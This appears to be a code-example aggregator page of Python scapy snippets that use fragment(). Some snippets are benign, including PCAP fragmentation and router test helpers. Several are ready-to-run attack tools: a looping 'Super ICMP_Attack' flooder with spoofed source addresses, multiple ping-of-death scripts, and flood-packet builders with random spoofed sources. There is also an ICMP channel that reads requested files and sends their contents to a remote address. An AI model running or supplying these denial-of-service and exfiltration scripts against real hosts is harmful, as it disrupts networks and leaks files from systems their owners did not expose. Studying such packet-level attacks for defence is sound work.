Пример #1
    def run(self, hosts):
        """Send one large, fragmented ICMP echo request to every host in *hosts*.

        Each probe carries a 60000-byte payload, so ``fragment()`` has to split
        it into several IP fragments before ``self.send_receive`` transmits it.
        """
        for target in hosts:
            # Build the complete echo request first, then fragment it.
            # Fragmented ICMP echo traffic of this size is unusual on most
            # networks and is typically easy for an IDS or firewall to flag.
            echo_request = IP(dst=str(target)) / ICMP() / ("X" * 60000)
            probe = fragment(echo_request)
            # Wait up to two seconds per host; the answer is only stored in the
            # visible part of this method.
            resp = self.send_receive(probe, timeout=2, verbose=0)
Пример #2
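def main():
    """Fragment the oversized IPv4 packets of a PCAP file into a new PCAP file.

    Command line: ``input_file output_file [--fragment-size/-s N]``.

    Every frame is parsed as Ethernet.  A frame whose payload is an IPv4
    packet with more than ``--fragment-size`` bytes after the IP header and
    with the DF (don't fragment) bit clear is replaced by its fragments; all
    other frames are copied unchanged.
    """
    parser = argparse.ArgumentParser(
        description='Fragments the IPv4 packets in the given PCAP file '
        'and writes the results to another file.')
    parser.add_argument('input_file')
    parser.add_argument('output_file')
    parser.add_argument(
        '--fragment-size',
        '-s',
        type=int,
        default=500,
        help='Fragment size. Packets larger than this are fragmented '
        'if their df flag is not set. Defaults to 500.')

    args = parser.parse_args()

    reader = RawPcapReader(args.input_file)
    try:
        writer = PcapWriter(args.output_file, append=False, sync=True)
        try:
            for pkt_data in reader:
                p = Ether(pkt_data[0])
                # Look at the layer directly above Ethernet through .payload
                # so that short frames (no IP, or IP without a payload) do not
                # raise IndexError the way p[1] / p[2] would.
                ip_layer = p.payload
                # Bit value 2 of the IP flags field is DF.  The previous test
                # (`& 2 != 0`) fragmented only packets that had DF *set*, the
                # opposite of what the --fragment-size help text promises.
                if (isinstance(ip_layer, IP)
                        and len(ip_layer.payload) > args.fragment_size
                        and ip_layer.flags & 2 == 0):
                    p = fragment(p, args.fragment_size)
                    print('Fragmented packet into {} fragments.'.format(len(p)))

                # p is either the untouched frame or the list of fragments.
                writer.write(p)
        finally:
            # Close the output file even when a frame fails to parse.
            writer.close()
    finally:
        reader.close()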
Пример #3
 def send_packet(packet):
     """Relay *packet* to the other known MAC address, fragmenting it first.

     Frames whose Ethernet source is not listed in ``macs`` are ignored.
     """
     origin = packet[Ether].src
     if origin not in macs:
         return

     # Clear the source MAC and the IP checksum so scapy recomputes them when
     # the frame is rebuilt for sending.
     del packet[Ether].src
     del packet[IP].chksum

     # ``macs`` is used as a two-entry list: pick the entry after the sender,
     # wrapping around.
     peer_slot = (macs.index(origin) + 1) % 2
     packet[Ether].dst = macs[peer_slot]

     for piece in fragment(packet):
         sendp(piece, verbose=0)
Пример #4
def sendPerSecond(timestamp, ip, dataSize, mac, packets):
    """Append the fragments of one *dataSize*-byte packet to *packets*, timing each step.

    The module-level packet ``p`` gets *ip* as its source address, is padded
    with *dataSize* "0" characters and fragmented.  Two lines of the form
    ``<size>,<seconds>`` are printed: one for building the fragments, one
    for extending the list.  *timestamp* and *mac* are not used in the
    visible part of this function.
    """
    #  p=Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize);
    started = time()
    p['IP'].src = ip
    filler = ''.zfill(dataSize)
    pieces = fragment(p / filler)
    print(str(size) + ',' + str(time() - started))

    started = time()
    packets.extend(pieces)
    print(str(size) + ',' + str(time() - started))

    # Restart the clock for whatever follows this excerpt.
    started = time()
Пример #5
 def generate_ip4_frags(self, payload_length, fragment_size):
     """Build a fragmented IPv4-in-IPv4 test packet and the expected inner packet.

     Returns ``(frags, p4_reply)``: the outer packet split by ``fragment()``
     using *fragment_size*, and the inner IP/UDP packet with its TTL lowered
     by one.
     """
     ether_hdr = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac)
     udp_part = UDP(sport=1234, dport=1234) / self.payload(payload_length)
     inner_ip = IP(src="1.2.3.4", dst=self.pg0.remote_ip4)

     # Outer (tunnel) header with a random IP id.
     tunnel_ip = IP(src=self.pg1.remote_ip4,
                    id=RandShort(),
                    dst=self.pg0.local_ip4)
     tunnelled = ether_hdr / tunnel_ip / inner_ip / udp_part
     frags = fragment(tunnelled, fragment_size)

     # The inner packet as it should look after one hop.
     expected_inner = inner_ip / udp_part
     expected_inner.ttl -= 1
     return frags, expected_inner
Пример #6
 def generate_ip4_frags(self, payload_length, fragment_size):
     """Return ``(fragments, reply)`` for an IP-in-IP fragmentation test.

     ``fragments`` is the Ethernet / outer IP / inner IP / UDP packet cut up
     by ``fragment()`` with *fragment_size*.  ``reply`` is the inner IP / UDP
     packet with ``ttl`` decremented once.
     """
     l2 = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac)
     l4 = UDP(sport=1234, dport=1234) / self.payload(payload_length)
     inner = IP(src="1.2.3.4", dst=self.pg0.remote_ip4)
     outer = IP(src=self.pg1.remote_ip4, id=RandShort(), dst=self.pg0.local_ip4)

     # Encapsulate first, then fragment the whole tunnelled frame.
     pieces = fragment(l2 / outer / inner / l4, fragment_size)

     reply = inner / l4
     reply.ttl -= 1
     return pieces, reply
Пример #7
def build_fragmented_icmp_packet(destination_ip):
    """Return the fragments of one ICMP packet with randomised header fields.

    The IP source address, the IP id and the ICMP id are scapy random values;
    TTL, payload and fragment size come from ``packet_builder``.  Because the
    source address is random, networks that apply source-address validation
    (BCP 38) drop such packets at the edge.

    Argument:
    destination_ip -- the IP address of the target

    """
    ip_header = IP(src=RandIP(),
                   dst=destination_ip,
                   id=RandShort(),
                   ttl=packet_builder.generate_ttl())
    icmp_header = ICMP(id=RandShort())
    body = packet_builder.generate_payload(min_count=1500, max_count=65500)
    size = packet_builder.generate_fragsize()
    return fragment(ip_header / icmp_header / body, fragsize=size)
Пример #8
def build_fragemneted_udp_packet(destination_ip, destination_port):
    """Return the fragments of one UDP packet with randomised header fields.

    The IP source address, the IP id and the UDP source port are scapy random
    values; TTL, payload and fragment size come from ``packet_builder``.
    Packets with a random source address are dropped by networks that apply
    source-address validation (BCP 38).

    Arguments:
    destination_ip -- the IP address of the target
    destination_port -- the target's port to which the packet will be sent

    """
    network_layer = IP(src=RandIP(),
                       dst=destination_ip,
                       id=RandShort(),
                       ttl=packet_builder.generate_ttl())
    transport_layer = UDP(sport=RandShort(), dport=destination_port)
    datagram = (network_layer / transport_layer /
                packet_builder.generate_payload(min_count=1500, max_count=65500))
    return fragment(datagram, fragsize=packet_builder.generate_fragsize())
Пример #9
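 def send_packet(self, packet, **kwargs):
     """
     Forge *packet* into an IP packet and transfer it, fragmenting if needed.

     ``kwargs["IP"]`` holds the keyword arguments for ``forge_packet``; it is
     created when absent and receives a random ``id`` unless the caller set
     one.  A forged packet longer than ``self.MTU`` is split with
     ``fragment()`` and every fragment is transferred on its own; all keyword
     arguments are passed on to ``transfer_packet``.

     Resolving a destination name is not done here (presumably inside
     ``transfer_packet`` -- confirm).
     """
     # ``dict.has_key`` does not exist on Python 3; ``setdefault`` and ``in``
     # behave the same way on Python 2.
     ip_fields = kwargs.setdefault("IP", {})
     if "id" not in ip_fields:
         ip_fields['id'] = random.randrange(1, 65535)

     p = self.forge_packet(packet, **ip_fields)

     if len(p) > self.MTU:
         # NOTE(review): scapy's fragsize counts IP payload bytes only, so a
         # fragment can exceed MTU once its header is added -- confirm that
         # this is intended.
         fragments = fragment(p, fragsize=self.MTU)
         for frag in fragments:
             self.transfer_packet(frag, **kwargs)
     else:
         self.transfer_packet(p, **kwargs)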
     '''
Пример #10
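    def send_packet(self, packet, **kwargs):
        """
        Forge *packet* into an IP packet, then transfer it whole or in fragments.

        The ``IP`` keyword argument is a dict of options for ``forge_packet``.
        It is created if the caller did not pass one, and a random ``id`` is
        added unless one is already present.  When the forged packet is longer
        than ``self.MTU`` it is cut up by ``fragment()`` and each piece goes
        through ``transfer_packet``; otherwise the packet is transferred as is.

        No destination-name lookup happens in this method (presumably it is
        part of ``transfer_packet`` -- confirm).
        """
        # Membership tests replace ``dict.has_key``, which Python 3 removed;
        # the result is the same on Python 2.
        if "IP" not in kwargs:
            kwargs["IP"] = {}
        if "id" not in kwargs["IP"]:
            kwargs["IP"]['id'] = random.randrange(1, 65535)

        p = self.forge_packet(packet, **kwargs["IP"])

        if len(p) <= self.MTU:
            self.transfer_packet(p, **kwargs)
            return

        # NOTE(review): fragsize is the per-fragment IP payload size in scapy,
        # so fragments may be larger than MTU with their header -- confirm.
        for frag in fragment(p, fragsize=self.MTU):
            self.transfer_packet(frag, **kwargs)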
        '''
Пример #11
    def fragment(self, original, fragsize):
        """
        Split *original* into exactly two packets.

        *fragsize* is the size passed to the module-level ``fragment()``; a
        value of 0 skips fragmentation.  Whatever that yields is normalised to
        two packets, returned as a tuple ``(first, second)``.
        """
        frags = [original] if fragsize == 0 else fragment(original, fragsize=fragsize)
        count = len(frags)

        if count == 1:
            # Nothing was split off (or fragmentation was skipped): hand back
            # the packet together with a copy of it.
            frags.append(frags[0].copy())
        elif count > 2:
            # Fold every fragment after the second one into the second one so
            # only two packets remain.
            for extra in frags[2:]:
                frags[1]["IP"].load += extra["IP"].load
            # The merged packet is now the last one, so it must not carry
            # "MF" any more; only "DF" is kept.
            frags[1]["IP"].flags = "DF"

        first, second = frags[0], frags[1]
        return first, second
Пример #12
def Ping_attack():
	"""Prompt for a target IP and send it fragmented ICMP echo requests until Ctrl+C.

	Every two seconds one echo request with a 2000-byte payload and a
	``scapy.RandIP()`` source address is fragmented and sent, and a running
	counter is printed.  Traffic with a random source address is dropped by
	networks that enforce source-address validation.
	"""
	os.system('clear')

	for banner_line in (
		"**************************************",
		"         Super ICMP_Attack",
		"**************************************",
		"please input your attack target's IP",
	):
		print(banner_line)

	target = input("[Super ICMP_attack]#")
	srcip = scapy.RandIP()

	sent = 0
	try:
		while True:
			echo = scapy.IP(src=srcip, dst=target) / scapy.ICMP() / ("X" * 2000)
			scapy.send(scapy.fragment(echo), verbose=False)
			sent += 1
			print("[+]Attack Number is " + str(sent))
			time.sleep(2)
	except KeyboardInterrupt:
		print("[-]Ctrl + C detected.....")
Пример #13
    def send(self, packet):
        """Wrap *packet* in IP/UDP, fragment it and write the fragments to ``self.sock``.

        The datagram goes from ``return_ip:return_port`` to
        ``target_ip:target_port``.  Each fragment is written as a 4-byte
        big-endian length followed by the fragment bytes.  The socket is
        created on demand through ``self.create()``; with ``raw_send`` set,
        ``self.close()`` is called after every fragment.
        """
        original_packet = (IP(dst=self.target_ip, src=self.return_ip) /
                           UDP(dport=self.target_port, sport=self.return_port) /
                           packet)
        if self.verbose > 1:
            print("Original packet:")
            original_packet.show()
        # The hexdump is printed regardless of the verbosity level.
        hexdump(str(original_packet))

        fragments = fragment(original_packet, fragsize=self.fragment_size)
        total = len(fragments)
        try:
            for i, frag in enumerate(fragments, 1):
                if self.verbose > 1:
                    print("Fragment %d of %d:" % (i, total))
                    frag.show()
                wire = str(frag)
                length = struct.pack(">I", len(wire))

                if not self.sock:
                    print('[+] connecting ...')
                    self.sock = self.create()

                print('[+] sending part %d of %d now..' % (i, total))
                hexdump(wire)
                if self.log:
                    self.log.packet('sending fragment %d of %d' % (i, total), wire)
                # NOTE(review): if self.sock is a plain stream socket, send()
                # may write only part of the buffer and break the length
                # framing; sendall() would be the safer call -- confirm the
                # socket type.
                self.sock.send(length)
                self.sock.send(wire)
                if self.log:
                    self.log('sent fragment %d of %d' % (i, total))

                if self.raw_send:
                    if self.log:
                        self.log('forcing a new connection due to raw_send flag')
                    self.close()

        except KeyboardInterrupt as e:
            print("[-] keyboard interrupt while connecting/sending to redirector")
            raise e
Пример #14
 def run(self):
     """Announce ``self.ip`` and send it one fragmented ICMP echo request.

     The payload is ``self.length`` "V" characters.
     """
     print("death pinging " + self.ip)
     echo_request = IP(dst=self.ip) / ICMP() / ("V" * self.length)
     send(fragment(echo_request))
Пример #15
def sendPerSecond(timestamp, ip, dataSize, mac, packets):
    """Append the fragments of one *dataSize*-byte packet from *ip* to *packets*.

    The shared ``packetPrototype`` gets *ip* as its source address and is
    padded with *dataSize* "0" characters before it is fragmented.
    *timestamp* and *mac* are not used.
    """
    #  p=Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize);
    packetPrototype['IP'].src = ip
    padding = ''.zfill(dataSize)
    pieces = fragment(packetPrototype / padding)
    packets.extend(pieces)
Пример #16
def POD(ip_addr, amt):
    """Send one fragmented ICMP echo request with an *amt*-byte payload to *ip_addr*.

    *amt* is converted with ``int()``.  Always returns 1.
    """
    headers = IP(dst=ip_addr) / ICMP()
    payload = "X" * int(amt)
    send(fragment(headers / payload))
    return 1
Пример #17
#!/usr/bin/python

# This tool is for educational use only!

# Description: Ping of death

# Requirements: scapy + root privileges

import sys
from scapy.all import send, fragment, IP, ICMP

# Usage guard: the destination address is the only argument.
if not sys.argv[1:]:
    print("{0} <dst_ip>".format(sys.argv[0]))
    sys.exit(1)

# One ICMP echo request with a 60000-byte payload, split into IP fragments by
# scapy before sending.  Fragmented ICMP echo of this size is unusual on most
# networks and is typically easy for an IDS or firewall to flag.
send(
    fragment(
        IP(dst=sys.argv[1]) / ICMP() / ("X" * 60000)
    )
)
Пример #18
#!/usr/bin/python

# This tool is for educational use only!

# Description: Ping of death

# Requirements: scapy + root privileges

import sys
from scapy.all import send, fragment, IP, ICMP

# Without a destination address, print the usage line and stop.
if len(sys.argv) <= 1:
    print("{0} <dst_ip>".format(sys.argv[0]))
    sys.exit(1)

# Fragment a single ICMP echo request carrying 60000 "X" bytes and send the
# fragments to the address given on the command line.
send(fragment(
    IP(dst=sys.argv[1]) / ICMP() / ("X" * 60000)))
Пример #19
                infos = data[:6]
                filename = data[6:]
                dataUnpacked = unpack('IH',infos)
                offset = dataUnpacked[0]
                size = dataUnpacked[1]
                sys.stdout.write("Filename : " + filename + "\nOffset : " + str(offset) + "\n")
                try:
                    f = open(filename)
                except:
                    print "%s not found"%filename
                    continue
                f.seek(offset)
                line = f.read(size)
                f.close()

                send(fragment(IP(dst=sys.argv[2]) / ICMP(type='echo-reply', id=ident, seq=seq_id)  / (line)))
            except:
                if len(data) == 0:
                    print "End"
                else:
                    print "Invalid ICMP buffer"


if __name__ == '__main__':
    # Both addresses are required; print the usage text to stderr otherwise.
    if len(sys.argv) < 3:
        sys.stderr.write(
            'missing mandatory options. Execute as root:\n'
            './icmpsh_download_cli.py <source IP address> <destination IP address>\n')
        sys.exit(1)

    source_ip, destination_ip = sys.argv[1], sys.argv[2]
    main(source_ip, destination_ip)
Пример #20
def sendPerSecond(timestamp, ip, dataSize, mac, packets):
    """Fragment one padded copy of ``packetPrototype`` and add the pieces to *packets*.

    *ip* becomes the prototype's IP source address and *dataSize* is the
    number of "0" characters used as payload.  *timestamp* and *mac* are
    accepted but not used.
    """
    #  p=Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize);
    packetPrototype['IP'].src = ip
    padded = packetPrototype / ''.zfill(dataSize)
    packets.extend(fragment(padded))